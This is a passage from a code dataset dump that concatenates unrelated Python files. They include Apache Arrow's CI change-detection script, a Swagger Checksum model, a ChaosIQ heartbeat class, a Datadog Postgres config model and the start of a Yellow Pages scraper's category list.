stderr=err.decode()))\n return out\n\n\ndef get_commit_description(commit):\n \"\"\"\n Return the textual description (title + body) of the given git commit.\n \"\"\"\n out = run_cmd([\"git\", \"show\", \"--no-patch\", \"--pretty=format:%B\",\n commit])\n return out.decode('utf-8', 'ignore')\n\n\ndef list_affected_files(commit_range):\n \"\"\"\n Return a list of files changed by the given git commit range.\n \"\"\"\n perr(\"Getting affected files from\", repr(commit_range))\n out = run_cmd([\"git\", \"diff\", \"--name-only\", commit_range])\n return list(filter(None, (s.strip() for s in out.decode().splitlines())))\n\n\ndef get_travis_head_commit():\n return os.environ['TRAVIS_COMMIT']\n\n\ndef get_travis_commit_range():\n if os.environ['TRAVIS_EVENT_TYPE'] == 'pull_request':\n # TRAVIS_COMMIT_RANGE is too pessimistic for PRs, as it may contain\n # unrelated changes. Instead, use the same strategy as on AppVeyor\n # below.\n run_cmd([\"git\", \"fetch\", \"-q\", \"origin\",\n \"+refs/heads/{0}\".format(os.environ['TRAVIS_BRANCH'])])\n merge_base = run_cmd([\"git\", \"merge-base\",\n \"HEAD\", \"FETCH_HEAD\"]).decode().strip()\n return \"{0}..HEAD\".format(merge_base)\n else:\n cr = os.environ['TRAVIS_COMMIT_RANGE']\n # See\n # https://github.com/travis-ci/travis-ci/issues/4596#issuecomment-139811122\n return cr.replace('...', '..')\n\n\ndef get_travis_commit_description():\n # Prefer this to get_commit_description(get_travis_head_commit()),\n # as rebasing or other repository events may make TRAVIS_COMMIT invalid\n # at the time we inspect it\n return os.environ['TRAVIS_COMMIT_MESSAGE']\n\n\ndef list_travis_affected_files():\n \"\"\"\n Return a list of files affected in the current Travis build.\n \"\"\"\n commit_range = get_travis_commit_range()\n try:\n return list_affected_files(commit_range)\n except RuntimeError:\n # TRAVIS_COMMIT_RANGE can contain invalid revisions when\n # building a branch (not a PR) after rebasing:\n # https://github.com/travis-ci/travis-ci/issues/2668\n if os.environ['TRAVIS_EVENT_TYPE'] == 'pull_request':\n raise\n # If it's a rebase, it's probably enough to use the last commit only\n commit_range = '{0}^..'.format(get_travis_head_commit())\n return list_affected_files(commit_range)\n\n\ndef list_appveyor_affected_files():\n \"\"\"\n Return a list of files affected in the current AppVeyor build.\n This only works for PR builds.\n \"\"\"\n # Re-fetch PR base branch (e.g. origin/master), pointing FETCH_HEAD to it\n run_cmd([\"git\", \"fetch\", \"-q\", \"origin\",\n \"+refs/heads/{0}\".format(os.environ['APPVEYOR_REPO_BRANCH'])])\n # Compute base changeset between FETCH_HEAD (PR base) and HEAD (PR head)\n merge_base = run_cmd([\"git\", \"merge-base\",\n \"HEAD\", \"FETCH_HEAD\"]).decode().strip()\n # Compute changes files between base changeset and HEAD\n return list_affected_files(\"{0}..HEAD\".format(merge_base))\n\n\nLANGUAGE_TOPICS = ['c_glib', 'cpp', 'docs', 'go', 'java', 'js', 'python',\n 'r', 'ruby', 'rust', 'csharp']\n\nALL_TOPICS = LANGUAGE_TOPICS + ['integration', 'site', 'dev']\n\n\nAFFECTED_DEPENDENCIES = {\n 'java': ['integration', 'python'],\n 'js': ['integration'],\n 'ci': ALL_TOPICS,\n 'cpp': ['python', 'c_glib', 'r', 'ruby', 'integration'],\n 'format': LANGUAGE_TOPICS,\n '.travis.yml': ALL_TOPICS,\n 'c_glib': ['ruby']\n}\n\nCOMPONENTS = {'cpp', 'java', 'c_glib', 'r', 'ruby', 'integration', 'js',\n 'rust', 'csharp', 'site', 'go', 'docs', 'python', 'dev'}\n\n\ndef get_affected_topics(affected_files):\n \"\"\"\n Return a dict of topics affected by the given files.\n Each dict value is True if affected, False otherwise.\n \"\"\"\n affected = dict.fromkeys(ALL_TOPICS, False)\n\n for path in affected_files:\n parts = []\n head = path\n while head:\n head, tail = os.path.split(head)\n parts.append(tail)\n parts.reverse()\n assert parts\n p = parts[0]\n fn = parts[-1]\n if fn.startswith('README'):\n continue\n\n if p in COMPONENTS:\n affected[p] = True\n\n _path_already_affected = {}\n\n def _affect_dependencies(component):\n if component in _path_already_affected:\n # For circular dependencies, terminate\n return\n for topic in AFFECTED_DEPENDENCIES.get(component, ()):\n affected[topic] = True\n _affect_dependencies(topic)\n _path_already_affected[topic] = True\n\n _affect_dependencies(p)\n\n return affected\n\n\ndef make_env_for_topics(affected):\n return {'ARROW_CI_{0}_AFFECTED'.format(k.upper()): '1' if v else '0'\n for k, v in affected.items()}\n\n\ndef get_unix_shell_eval(env):\n \"\"\"\n Return a shell-evalable string to setup some environment variables.\n \"\"\"\n return \"; \".join((\"export {0}='{1}'\".format(k, v)\n for k, v in env.items()))\n\n\ndef get_windows_shell_eval(env):\n \"\"\"\n Return a shell-evalable string to setup some environment variables.\n \"\"\"\n return \"\\n\".join(('set \"{0}={1}\"'.format(k, v)\n for k, v in env.items()))\n\n\ndef run_from_travis():\n perr(\"Environment variables (excerpt):\")\n dump_env_vars('TRAVIS_', '(BRANCH|COMMIT|PULL)')\n if (os.environ['TRAVIS_REPO_SLUG'] == 'apache/arrow' and\n os.environ['TRAVIS_BRANCH'] == 'master' and\n os.environ['TRAVIS_EVENT_TYPE'] != 'pull_request'):\n # Never skip anything on master builds in the official repository\n affected = dict.fromkeys(ALL_TOPICS, True)\n else:\n desc = get_travis_commit_description()\n if '[skip travis]' in desc:\n # Skip everything\n affected = dict.fromkeys(ALL_TOPICS, False)\n elif '[force ci]' in desc or '[force travis]' in desc:\n # Test everything\n affected = dict.fromkeys(ALL_TOPICS, True)\n else:\n # Test affected topics\n affected_files = list_travis_affected_files()\n perr(\"Affected files:\", affected_files)\n affected = get_affected_topics(affected_files)\n assert set(affected) <= set(ALL_TOPICS), affected\n\n perr(\"Affected topics:\")\n perr(pprint.pformat(affected))\n return get_unix_shell_eval(make_env_for_topics(affected))\n\n\ndef run_from_appveyor():\n perr(\"Environment variables (excerpt):\")\n dump_env_vars('APPVEYOR_', '(PULL|REPO)')\n if not os.environ.get('APPVEYOR_PULL_REQUEST_HEAD_COMMIT'):\n # Not a PR build, test everything\n affected = dict.fromkeys(ALL_TOPICS, True)\n else:\n affected_files = list_appveyor_affected_files()\n perr(\"Affected files:\", affected_files)\n affected = get_affected_topics(affected_files)\n assert set(affected) <= set(ALL_TOPICS), affected\n\n perr(\"Affected topics:\")\n perr(pprint.pformat(affected))\n return get_windows_shell_eval(make_env_for_topics(affected))\n\n\ndef test_get_affected_topics():\n affected_topics = get_affected_topics(['cpp/CMakeLists.txt'])\n assert affected_topics == {\n 'c_glib': True,\n 'cpp': True,\n 'docs': False,\n 'go': False,\n 'java': False,\n 'js': False,\n 'python': True,\n 'r': True,\n 'ruby': True,\n 'rust': False,\n 'csharp': False,\n 'integration': True,\n 'site': False,\n 'dev': False\n }\n\n affected_topics = get_affected_topics(['format/Schema.fbs'])\n assert affected_topics == {\n 'c_glib': True,\n 'cpp': True,\n 'docs': True,\n 'go': True,\n 'java': True,\n 'js': True,\n 'python': True,\n 'r': True,\n 'ruby': True,\n 'rust': True,\n 'csharp': True,\n 'integration': True,\n 'site': False,\n 'dev': False\n }\n\n\nif __name__ == \"__main__\":\n # This script should have its output evaluated by a shell,\n # e.g. \"eval `python ci/detect-changes.py`\"\n if os.environ.get('TRAVIS'):\n try:\n print(run_from_travis())\n except Exception:\n # Make sure the enclosing eval will return an error\n print(\"exit 1\")\n raise\n elif os.environ.get('APPVEYOR'):\n try:\n print(run_from_appveyor())\n except Exception:\n print(\"exit 1\")\n raise\n else:\n sys.exit(\"Script must be run under Travis-CI or AppVeyor\")\n"} {"ext": "py", "sha": "1a30ed830b6ac8e84a7afbb611f1e85fd85aad12", "content": "# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom biocontainers_flask.server.models.base_model_ import Model\nfrom biocontainers_flask.server import util\n\n\nclass Checksum(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n def __init__(self, checksum: str=None, type: str=None): # noqa: E501\n \"\"\"Checksum - a model defined in Swagger\n\n :param checksum: The checksum of this Checksum. # noqa: E501\n :type checksum: str\n :param type: The type of this Checksum. # noqa: E501\n :type type: str\n \"\"\"\n self.swagger_types = {\n 'checksum': str,\n 'type': str\n }\n\n self.attribute_map = {\n 'checksum': 'checksum',\n 'type': 'type'\n }\n self._checksum = checksum\n self._type = type\n\n @classmethod\n def from_dict(cls, dikt) -> 'Checksum':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The Checksum of this Checksum. # noqa: E501\n :rtype: Checksum\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def checksum(self) -> str:\n \"\"\"Gets the checksum of this Checksum.\n\n The hex-string encoded checksum for the data. # noqa: E501\n\n :return: The checksum of this Checksum.\n :rtype: str\n \"\"\"\n return self._checksum\n\n @checksum.setter\n def checksum(self, checksum: str):\n \"\"\"Sets the checksum of this Checksum.\n\n The hex-string encoded checksum for the data. # noqa: E501\n\n :param checksum: The checksum of this Checksum.\n :type checksum: str\n \"\"\"\n if checksum is None:\n raise ValueError(\"Invalid value for `checksum`, must not be `None`\") # noqa: E501\n\n self._checksum = checksum\n\n @property\n def type(self) -> str:\n \"\"\"Gets the type of this Checksum.\n\n The digest method used to create the checksum. The value (e.g. `sha-256`) SHOULD be listed as `Hash Name String` in the https://github.com/ga4gh-discovery/ga4gh-checksum/blob/master/hash-alg.csv[GA4GH Checksum Hash Algorithm Registry]. Other values MAY be used, as long as implementors are aware of the issues discussed in https://tools.ietf.org/html/rfc6920#section-9.4[RFC6920]. GA4GH may provide more explicit guidance for use of non-IANA-registered algorithms in the future. # noqa: E501\n\n :return: The type of this Checksum.\n :rtype: str\n \"\"\"\n return self._type\n\n @type.setter\n def type(self, type: str):\n \"\"\"Sets the type of this Checksum.\n\n The digest method used to create the checksum. The value (e.g. `sha-256`) SHOULD be listed as `Hash Name String` in the https://github.com/ga4gh-discovery/ga4gh-checksum/blob/master/hash-alg.csv[GA4GH Checksum Hash Algorithm Registry]. Other values MAY be used, as long as implementors are aware of the issues discussed in https://tools.ietf.org/html/rfc6920#section-9.4[RFC6920]. GA4GH may provide more explicit guidance for use of non-IANA-registered algorithms in the future. # noqa: E501\n\n :param type: The type of this Checksum.\n :type type: str\n \"\"\"\n if type is None:\n raise ValueError(\"Invalid value for `type`, must not be `None`\") # noqa: E501\n\n self._type = type\n"} {"ext": "py", "sha": "1a30ee20ff75f166ba6f3f1669d8414f9ffd9869", "content": "from .config import UTILS1_LOGLEVEL\nimport logging\nfrom log_utils.utils import get_logger_with_file_handler\n\nformatter = 'logger name : %(name)s ,%(levelname)s , func : %(funcName)s , %(message)s , module : %(module)s ,line : %(lineno)d , %(asctime)s'\nlogger = get_logger_with_file_handler(__name__,UTILS1_LOGLEVEL,formatter)\nstream_handler = logging.StreamHandler()\nlogger.addHandler(stream_handler)\n\n\ndef add(num1 : float,num2 : float)->float:\n logger.warning(f'args : {num1} , {num2}')\n return num1+num2"} {"ext": "py", "sha": "1a30f0555ab7f6904a9b7f6b36c59c9a49211b1a", "content": "import asyncio\nimport contextlib\nfrom types import TracebackType\nfrom typing import Optional, Type, Dict, Any\n\nimport aiojobs\nfrom aiojobs import Scheduler\n\nfrom .client import ChaosIQClient\nfrom .log import logger\nfrom .types import Config\n\n\n__all__ = [\"Heartbeat\"]\n\n\nclass Heartbeat:\n def __init__(self, config: Config) -> None:\n self.sched: Scheduler = None\n self.config = config\n self._running = False\n self.aiojob = None\n\n async def __aenter__(self) -> 'Heartbeat':\n await self.setup()\n return self\n\n async def __aexit__(self, exc_type: Optional[Type[BaseException]],\n exc_value: Optional[BaseException],\n traceback: Optional[TracebackType]) -> None:\n await self.cleanup()\n\n @property\n def running(self) -> bool:\n \"\"\"\n Flag that is set when the heartbeat is active.\n \"\"\"\n return self._running\n\n async def setup(self) -> None:\n \"\"\"\n Create the underlying scheduler to periodically send the heartbeat.\n \"\"\"\n logger.info(\"Creating heartbeat loop\")\n self.sched = await asyncio.wait_for(\n aiojobs.create_scheduler(\n exception_handler=self.aiojobs_exception), None)\n\n period = self.config.heartbeat_interval\n if not period:\n logger.critical(f\"Heartbeat is not properly configured; \"\n f\"interval '{period}' is not valid\")\n return\n\n logger.info(\"Spawning the heartbeat...\")\n self.aiojob = await self.sched.spawn(self.send_pulse())\n\n async def cleanup(self) -> None:\n \"\"\"\n Gracefully terminate the scheduler.\n \"\"\"\n if self.aiojob:\n logger.info(\"Stopping heartbeat pulse...\")\n await self.aiojob.close()\n\n if not self.sched.closed:\n logger.info(\"Closing heartbeat loop\")\n await asyncio.wait_for(self.sched.close(), None)\n\n self._running = False\n\n async def send_pulse(self) -> None:\n \"\"\"\n Sends its heartbeat periodically to the console\n\n This must be interrupted instantly and not until wait is complete !!\n We can NOT wait for end of iddle before leaving the loop\n \"\"\"\n self._running = True\n wait = self.config.heartbeat_interval\n logger.info(f\"Sending heartbeat every {wait} seconds\")\n\n while self._running and not self.sched.closed:\n await asyncio.sleep(wait)\n\n with contextlib.suppress(Exception):\n async with ChaosIQClient(self.config) as client:\n await client.post(\n \"/agent/actions\", json={\"action\": \"heartbeat\"})\n\n @staticmethod\n def aiojobs_exception(\n scheduler: Scheduler,\n context: Dict[str, Any]) -> None: # pragma: no cover\n logger.error(context)\n"} {"ext": "py", "sha": "1a30f0602c7f03d5176c176c9d096e25d9ea9968", "content": "# (C) Datadog, Inc. 2021-present\n# All rights reserved\n# Licensed under a 3-clause BSD style license (see LICENSE)\n\n# This file is autogenerated.\n# To change this file you should edit assets/configuration/spec.yaml and then run the following commands:\n# ddev -x validate config -s <INTEGRATION_NAME>\n# ddev -x validate models -s <INTEGRATION_NAME>\n\nfrom __future__ import annotations\n\nfrom typing import Any, Mapping, Optional, Sequence, Union\n\nfrom pydantic import BaseModel, root_validator, validator\n\nfrom datadog_checks.base.utils.functions import identity\nfrom datadog_checks.base.utils.models import validation\n\nfrom . import defaults, validators\n\n\nclass ObfuscatorOptions(BaseModel):\n class Config:\n allow_mutation = False\n\n collect_commands: Optional[bool]\n collect_comments: Optional[bool]\n collect_metadata: Optional[bool]\n collect_tables: Optional[bool]\n replace_digits: Optional[bool]\n\n\nclass QueryActivity(BaseModel):\n class Config:\n allow_mutation = False\n\n collection_interval: Optional[float]\n enabled: Optional[bool]\n payload_row_limit: Optional[float]\n\n\nclass QueryMetrics(BaseModel):\n class Config:\n allow_mutation = False\n\n collection_interval: Optional[float]\n enabled: Optional[bool]\n\n\nclass QuerySamples(BaseModel):\n class Config:\n allow_mutation = False\n\n collection_interval: Optional[float]\n enabled: Optional[bool]\n explain_function: Optional[str]\n explained_queries_cache_maxsize: Optional[int]\n explained_queries_per_hour_per_query: Optional[int]\n samples_per_hour_per_query: Optional[int]\n seen_samples_cache_maxsize: Optional[int]\n\n\nclass Relation(BaseModel):\n class Config:\n allow_mutation = False\n\n relation_name: Optional[str]\n relation_regex: Optional[str]\n relation_schema: Optional[str]\n relkind: Optional[Sequence[str]]\n schemas: Optional[Sequence[str]]\n\n\nclass InstanceConfig(BaseModel):\n class Config:\n allow_mutation = False\n\n application_name: Optional[str]\n collect_activity_metrics: Optional[bool]\n collect_bloat_metrics: Optional[bool]\n collect_count_metrics: Optional[bool]\n collect_database_size_metrics: Optional[bool]\n collect_default_database: Optional[bool]\n collect_function_metrics: Optional[bool]\n collect_wal_metrics: Optional[bool]\n custom_queries: Optional[Sequence[Mapping[str, Any]]]\n data_directory: Optional[str]\n dbm: Optional[bool]\n dbname: Optional[str]\n dbstrict: Optional[bool]\n disable_generic_tags: Optional[bool]\n empty_default_hostname: Optional[bool]\n host: str\n ignore_databases: Optional[Sequence[str]]\n max_relations: Optional[int]\n min_collection_interval: Optional[float]\n obfuscator_options: Optional[ObfuscatorOptions]\n password: Optional[str]\n pg_stat_statements_view: Optional[str]\n port: Optional[int]\n query_activity: Optional[QueryActivity]\n query_metrics: Optional[QueryMetrics]\n query_samples: Optional[QuerySamples]\n query_timeout: Optional[int]\n relations: Optional[Sequence[Union[str, Relation]]]\n reported_hostname: Optional[str]\n service: Optional[str]\n ssl: Optional[str]\n ssl_cert: Optional[str]\n ssl_key: Optional[str]\n ssl_password: Optional[str]\n ssl_root_cert: Optional[str]\n table_count_limit: Optional[int]\n tag_replication_role: Optional[bool]\n tags: Optional[Sequence[str]]\n username: str\n\n @root_validator(pre=True)\n def _initial_validation(cls, values):\n return validation.core.initialize_config(getattr(validators, 'initialize_instance', identity)(values))\n\n @validator('*', pre=True, always=True)\n def _ensure_defaults(cls, v, field):\n if v is not None or field.required:\n return v\n\n return getattr(defaults, f'instance_{field.name}')(field, v)\n\n @validator('*')\n def _run_validations(cls, v, field):\n if not v:\n return v\n\n return getattr(validators, f'instance_{field.name}', identity)(v, field=field)\n\n @root_validator(pre=False)\n def _final_validation(cls, values):\n return validation.core.finalize_config(getattr(validators, 'finalize_instance', identity)(values))\n"} {"ext": "py", "sha": "1a30f0d9cda97bfc18e9641607afe1ecb74c6d95", "content": "# Kendall Jackson MIT License\n\n# GetScraped Private v1\n\n#parse_listing from https://github.com/scrapehero/yellowpages-scraper\n\n#!/usr/bin/env python\n\n# -*- coding: utf-8 -*-\n\nimport requests\n\nfrom lxml import html\n\nimport unicodecsv as csv\n\n#import argparse\n\nfinal_list = []\n\nstate = 'AZ'\n\ncategories = ['Abrasive Dealers','Abundant Life Churches','AC Repairs','Accommodation','Acupuncture','Adhesive','Adoption Centres','Adventure Clubs','Advertising','Advertising Agencies','Advocates','Aerobics','Aeronautical Engineering Colleges','Air And Train Ambulance Services','Air Cargo Agents','Air Conditioners','Air Coolers','Air Hostess Training Institutes','Air Pollution Control Equipment Dealers','Alliance Churches','Alloy, Iron & Steel Industries','Alternative Fuels Stations','Alternative Medicines','Aluminium Extrusion Industry','Ambulance Services','Ammonia Gas Dealers','Amusement Parks','Anglican Churches','Animation Training Institutes','Apostolic Churches','Apparels & Accessories','Apple Product Repair','Aquarium','Architects','Area Rugs & Mats','Armenian Churches','Arms & Ammunition Dealer','Arms And Ammunitions','Art Gallery','Art Paintings','Artificial Grass','Artificial Turf','Arts & Craft Classes','Astrologers','ATM Centres','Audio Video Systems','Auditoriums','Auto Dealers','Auto Service Centres','Automobile Engine Oil Dealers','Automobiles','Aviation Academies','Ayurvedic Food','Ayurvedic Medicines','Ayurvedic Treatment','B 2 B','B Pharmacy Colleges','B.Ed. Colleges','Baby Foods','Baby Store','Bakeries','Bakery Equipments','Balloon Decorations','Bamboo Flooring','Bangles','Banks','Banquet Halls','Baptist Churches','Bar Coding Machine Dealer','Bars','Bathroom Linen','Battery Dealers','BDS Colleges','Bean Bags','Beautician Training Institutes','Beauty & Wellness','Beauty And Cosmetic Products','Beauty Parlours','Bed Linen','Bed Room Furniture','Beef Shops','Belts & Wallets','Bicycle Stores','Bike Rentals','Billing Machine Dealers','Binding','Binoculars & Telescope','Birth Certificate Offices','Blocks Material','Blood Donation Centres','Blow Moulding Machine Dealer','Body Massage Parlours','Boilers','Book Publishers','Books Stores','Bore Well Drilling','Boutiques','Bowling','Brick Materials','Bridal Makeup','Budget Hotels','Building and Construction','Building Demolition','Building Materials','Bulk SMS Modems','Bulk Sms Services','Burqa Retailers','Business Cards','Business Consultants','Business Hotels','CA & ICWA Training Institutes','Cable Manufacturers','Cable Tv Operators','Cabs Services','Cafes','Cake Shops','Calvary Chapel Churches','Camera Accessories','Camera Lens','Cameras','Candles','Caps & Hats','Car Ac Repairs','Car Accessories','Car Dealers','Car Rentals','Car Repairs & Services','Carbon Dioxide Gas Dealers','Cargo & Logistics','Cargo Agents','Carpenters','Carpet & Rugs','Carpet And Carpet Tiles','Casual Dining','Catering Services','Catholic Churches','CBSC Schools','Cement Materials','Central Government Offices','Centreing Materials','Chairs','Chandeliers','Charitable Trusts','Chartered Accountants','Chartered Bus','Chat & Snacks','Chicken Shops','Children Wear','Childrens Hospitals','Chimneys','Snacks','Chit Funds','Chocolate Shops','Churches','Cinema Theaters','Citric Acid Dealers','City Clerk Offices','City Government Offices','Civil Contractors','Cleaning Tools & Accessories','Clinics','Clocks','Cloud Software','Clubs','CNG Pump Stations','Coarse Aggregates','Commercial Kitchen Equipment Dealers','Communication','Competitive Exams','Computer Accessories & Peripherals','Computers','Computers, Tablets & Mobiles','Conference Hall','Construction & Renovation','Construction Companies','Consultants','Contact Lenses','Content Writers','Contractors','Convention Centres','Cooking Classes','Cooks On Hire','Cooktops','Cookware','Corporate Catering Services','Corporate Gifts','Cosmetic Surgery','Couriers','Courts','CPAP & BIPAP Systems','Crackers','Crane Services','Cremation Grounds','Cremation Services','Curtain Accessories','Cushion & Cushion Covers','Cutlery','Dance Academies','Dead Body Freezer Box On Hire','Decor & Lightings','Decor & Show Pieces','Decoration Materials','Degree Colleges','Dental Clinics','Designing & Wood Carving','Detective Agencies','Dhaba','Diagnostic Centres','Diesel Gas Stations','Dietician','Digital Cameras','Digital Printers','Digital Weighing Scale Dealers','Dining','Dining Room Furniture','Dining Sets','Disc Jockey Training Institutes','Dishwasher','Diwan Sets','Doctors','Dog Training','Doors, Windows & Partitions','Drama Theaters','Dress Materials','Drilling Equipments','Driver Service Agents','Dry Fruits','Dry Ice Dealer','DSLR Cameras','DTP Services','Dvd & Vcd','Eastern Orthodox Churches','Education','Education Colleges','Education Consultants','Education Councils & Board Offices','Education Schools','Egg Shops','Electrical Contractors','Electrical Sub-Stations','Electrical Suppliers','Electricians','Electronic Accessories','Electronic Display Boards Manufacturer','Electronic Weighing Scale Dealers','Electronics','Elevators','Email Marketing','Embroidery Works','Emergency Services','Engineering Colleges','ENT Hospitals','Entrance Exams Coaching Centres','Establishments','Ethnic Wear','Evangelical Churches','Event Decorators','Event Management','Event Organizers','Event Venues','Events Catering Services','Excavation','Eye Hospitals','Eyeglasses','Fabrication & Welding Works','False Ceiling','Family Clubs','Fans','Farm Houses','Fashion Designers','Fashion Designing Training Institutes','Fast Food Centre','Fertility & Infertility Clinics','Fertilizer & Soil','Film And Television Institute Of India','Film Studios','Financial Planners','Financial Services','Fine Dining','Fire Alarms','Fire And Safety Course Training','Fire Extinguishers','Fire Protection Systems','Fire Safety Equipments','Fire Stations','Fish & Sea Food Shops','Fitness Centres','Flex Printing Services','Flooring','Flooring Installations','Flooring Tools & Materials','Florists','Flower Decorations','Food & Beverage Outlets','Food & Beverages','Food Courts','Food Machinery Manufacturer','Food Processing Equipment Manufacturer','Food Stores','Footwear','Foreign Exchange','Foursquare Churches','Frames','Fruit Juice Processing Machine Manufacture','Fruits','Full Gospel Churches','Function Halls','Funeral Band','Funeral Materials','Furnishings','Furniture','Furniture on Hire','Furniture Storage','Gaming Centres','Gardening Tools','Garments','Gas Dealers','Gas Stations','Gemological Institute Of India','General Hospitals','General order suppliers','General Pharmacies','GI Pipe Dealer','Gifts And Novelties','Glass Fitting Hardware','Glasswares','Go Karting','Goldsmiths','Gospel Churches','Government Hospitals','Government Offices','Graphic Designers','GRE & TOEFL Coaching Centres','Greek Orthodox Churches','Groceries','Groundwater Surveyors','Guest Houses','Gurudwaras','Water Heater Repair','Gymnasium','Gymnasium Equipments','Hair Fall Treatments','Hair Stylists','Hair Transplantation','Hair Treatments','Hall Decorations','Handicraft Items','Handlooms','Hardware And Network Training Institutes','Hardware And Networking','Hardware Stores','Hardware Tools','Hardwood Flooring','HD Cameras','Health','Health Clubs','Hearse Services','Heavy Vehicle Dealers','Helmet Dealers','Hispanic Churches','Home Appliances','Home Builders','Home Delivery Restaurants','Home Furniture','Home Needs','Home Theater Systems','Homeopathy Clinics','Homeopathy Medicines','Hosiery Store','Hospitals','Hotels','House Painters','Housekeeping Services','Hr Consultancies','Hydraulic & Pulley Equipment Dealers','Hydrochloric Acid Dealers','Hypermarkets','IB Schools','Ice Cream & Dessert Parlors','ICSE Schools','IGCSE Schools','Immigration Consultants','Income Tax Offices','Industrial Bearing Dealers','Industrial Belt Dealers','Industrial Burner Dealers','Industrial Chemical Dealers','Industrial Electronic Components Dealers','Industrial Equipments','Industrial Fan Dealers','Industrial Fire Extinguisher Dealers','industrial machine dealers','Industrial Safety Equipment Dealers','Industrial Spring Dealers','Industrial Trolleys Manufacturer','Innerwear And Loungewear','Institute Of Hotel Management','Insurance Agents','Interior Design Courses','Interior Designers','Internet Service Providers','Inverters','Investment Advisors','Irrigation Equipment Dealers','ITI Training','Jain Temples','Jeans','Jewellery','Jewellery Box Manufacturers','Journalism Training Institutes','Juice Centre','Junior Colleges','Kalyana Mandapam','Kennels','Kitchen & Dining','Kitchen Storage Containers','Lab Equipment And Chemical Suppliers','Labor Contractors','Laboratories','Ladies Bags & Purses','Ladies Dresses','Laminate Flooring','Language Training Institutes','Laptop Repair','Laptops','Lathe Machine Dealers','Laundry Services','Law Colleges','Lawn & Garden','Leather Goods Manufacturer','Legal & Financial Services','Legal Services','Libraries','Lifestyle Accessories','Lightings','Living Room Furniture','Loan Agencies','Loan Agents','Local Government Offices','Locks','Lodges','Logistic Companies','Logistics Services','Lounges','Luxury Hotels','Maggam Job Works','Makeup Artists','Manufacturer of Power Generators','Marriage Bureaus','Marriage Halls','Mass Communication & Journalism Colleges','Matching Centres','Maternity Hospitals','Mattresses','Meat & Poultry Shops','Media Advertising','Medical Coding Training Institutes','Medical Colleges','Medical Equipments','Medical Stockings','Meditation Centres','Mehandi Artists','Mennonite Churches','Mens Hostels','Mesh Dealers','Metal Industries','Methodist Churches','Metro Rail Stations','Microbreweries','Microwave Repairs','Military Recruiting Offices','Milk & Milk Products','Mineral Water Suppliers','Mobile Phones','Mobile Repairs','Mobile Repairs','Modular Furniture','Modular Kitchen Dealers','Money Transfer Agencies','Montessori Training Institutes','Moravian Churches','Morgues Services','Mormon Churches','Mosques','Motor Driving Schools','Mould Dies Manufacturer','Moving Media Ads','Mp3 Players','MS Pipe Dealer','Multispecialty Hospitals','Museums','Music Academies','Musical Instruments','Mutton Shops','Natural Flooring','Nature Cure Centers','Naturopathy','Network Securities','Networking Devices','New Age Churches','Newspaper Ads','NGO Clubs','NGOs & Social Service Organisations','Night Clubs','Night Life','Night Wears','Nitric Acid Dealers','Notary Services','Number Plate Manufacturers','Nursing Colleges','Nutritional Supplement Dealers','Office Furniture','Offices','Offset Printers','Old Age Homes','Old Cut Notes Exchange Services','Online Classes','Optics & Eyewear','Organ Donation Centres','Orphanages & Shelters','Orthodox Churches','Other Vehicles','Outdoor Advertising','Outdoor Catering Services','Outdoor Furniture','Overseas Education Consultants','Oxygen Concentrators','Oxygen Gas Dealers','P R P Hair Treatments','Packers And Movers','Packing Machine Manufacturers','Painters','Painting Suppliers','Pan Shops','Pants','Paper Rolls Manufacturers','Paper Stores','Parks','Part Time Jobs Consultancies','Party Halls','Passport Offices','Pawn Brokers','Pcs & Desktops','Pedicure & Manicure','Pen Stores','Pentecostal Churches','Perforated Sheet Manufacturers','Perfumes','Personal Fitness Trainers','Personality Development Training Institutes','Pest Control Services','Pet Shops','Pets','PG Colleges','Pharmaceutical Companies','Pharmaceutical Packaging Material Dealers','Pharmacies','Pharmacy Colleges','Photo Frames','Photo Studios','Photocopiers','Photographers','Photography Training Institutes','physiotherapist','Physiotherapy Clinics','Piercing','Pilot Training Institutes','Pipe Dealers','Pizza Restaurants','Placement Consultants','Plants','Plastic & Disposable Items','Plastic Injection Moulding Machine Dealer','Plastic Products Manufacturers','Play Schools','Play Stations','Playground Equipments','Playgrounds','Plumbers','Plumbing','Plywood & Laminates','Police Stations','Political Party Offices','Pollution Inspection Stations','Polymers & Asbestos Products Dealer','Polytechnic Colleges','Pork Shops','Post Offices','Power Generator Suppliers','Power Stations','Power Tools Dealers','Presbyterian Churches','Printed Circuit Board Dealers','Printers','Printing & Stationaries','Printing Machines','Printing Materials','Printing Press','Professional Services','Professionals','Project Management Training Institutes','Projectors','Promotional Products','Property Consultants','Property Dealers','Protestant Churches','Public Safety Offices','Pubs','Pumps & Controllers','Pundits','PVC Pipe Dealer','Quaker Churches','Quick Bites','Radio Jockey Training Institutes','Radio Stations','Radium Works','Railings','Railway Cargo Agents','Railway Stations','Ready Made Garments','Ready Mix Concrete','Real Estate','Real Estate Agents','Real Estate Developers','Real Estate Loans & Mortgages','Recording Studios','Reformed Churches','Refrigerator Repair','Refrigerators','Registry Offices','Rehabilitation Centres','Religion','Research Institutes','Residential Designers','Resins & Chemicals Manufacturer','Resorts','Restaurant Test','Restaurants','RO Water Purifier','Road Cargo Agents','Robotics Engineering','Robotics Training Institutes','Roofing Sheets','RTA Offices','Rubber Oil Seals Dealer','Rubber Product Dealer','Rubber Product Manufacturers','Rubber Stamps','Rudraksha','Russian Orthodox Churches','Sand Materials','Sandals & Floaters','Sanitaryware & Bathroom Accessories','Sarees & Blouses','Scalp Treatments','School District Offices','School For Mentally Challenged','Scrap Dealers','Screen Printers','Sea Cargo Agents','Seat Cover & Rexine Works','Security Guard Services','Security Services','Security Systems','Seeds','SelfDefence Training Services','Servers','Service Centres','Serviced Apartments','Seventh-Day Adventist Churches','Sewing Machine Dealers','Share Brokers','Shipping Companies','Shirts','Shoes','Shopping Malls','Shorts & Cargo','Sign Boards','Signage','Singing Classes','Skin Care Clinics','Snooker Parlours','Socks','Sofa Sets','Software & IT Services','Software Certifications','Software Dealers','Software Development','Software Training Institutes','Solar Products Manufacturers','Sound And Lighting On Hire','Sound Systems','Spa & Saloon','Spare Part Dealers','Spare Parts & Accessories','Speakers','Spiritual And Pooja Accessories','Spiritual Centres','Spoken English Institutes','Sports','Sports Academies','Sports Clubs','Sports Equipments','Sports Stores','Sports Wear','Sports, Entertainment & Hobbies','Stadiums','Stage Decorations','Stainless Steel Pipe Dealer','Stamp Papers','Standees & Demo Tents','State Board 